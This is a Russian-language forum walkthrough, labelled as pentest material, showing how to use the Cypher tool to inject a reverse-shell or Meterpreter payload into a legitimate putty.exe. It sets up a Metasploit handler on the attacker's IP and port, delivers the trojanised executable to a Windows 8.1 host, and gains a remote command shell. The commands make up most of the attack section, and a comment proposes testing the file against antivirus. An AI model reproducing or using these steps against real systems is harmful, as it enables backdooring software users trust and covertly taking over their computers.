РАЗБОР Pentest

Взлом Windows PC - Cypher

Vander
Vander CodebyTeam · 1,4 тыс. сообщений
Подписаться
13 тыс.
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.

upload_2016-12-10_21-57-36.png


В качестве атакующей системы будет использоваться OS Kali Linux,

upload_2016-12-10_21-57-52.png


в качестве целевой системы Windows 8.1 с актуальными обновлениями.

upload_2016-12-10_21-58-7.png


Итак, вернемся к Cypher, скачиваем ее с Github:

> git clone https://github.com/xan7r/cypher

upload_2016-12-10_21-58-32.png


Выполняем следующие команды:

> cd cypher

> chmod a+x addShell.py

> ls –a

Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.

upload_2016-12-10_21-59-26.png



Теперь выполним следующую команду:

> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

upload_2016-12-10_21-59-50.png


В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.

· 0 – windows/shell_reverse_tcp

· 1 – windows/meterpreter/reverse_http

· 2 – windows/meterpreter/reverse_http +PrependMigrate

· 3 – windows/meterpreter/reverse_https

· 4 – windows/meterpreter/reverse_https +PrependMigrate

По итогу получаем файл putty_evil.exe в папке с Cypher.

upload_2016-12-10_22-0-26.png


Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
upload_2016-12-10_22-1-3.png


Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.

upload_2016-12-10_22-1-46.png


Сменим кодировку командой:

> chcp 65001

upload_2016-12-10_22-2-9.png


Посмотрим подробную информацию о системе:

> systeminfo


upload_2016-12-10_22-2-36.png


Это все. Спасибо за внимание.
 
AI-выжимка (тезисы)
Cypher с GitHub (xan7r/cypher) встраивает полезную нагрузку в исполняемый файл, сохраняя его работоспособность
Демонстрация: атакующая система Kali Linux, цель — Windows 8.1 с актуальными обновлениями
Скрипт addShell.py принимает 5 типов нагрузки, от windows/shell_reverse_tcp до reverse_https с PrependMigrate
Команда вида addShell.py -f putty.exe -H 192.168.0.105 -P 4444 -p 0 создаёт заражённый putty_evil.exe
На атакующем хосте поднимается handler в msfconsole с параметрами LPORT 4444 и LHOST атакующей машины
После запуска заражённого файла на цели атакующий получает полноценный command shell
Кодировку сессии можно исправить командой chcp 65001, данные о системе собираются через systeminfo
Домен (таксономия витрины «Разборы»)
Pentest

Комментарии

20
Нужно потестить на различных антивирусах. А так очень позновательно ;D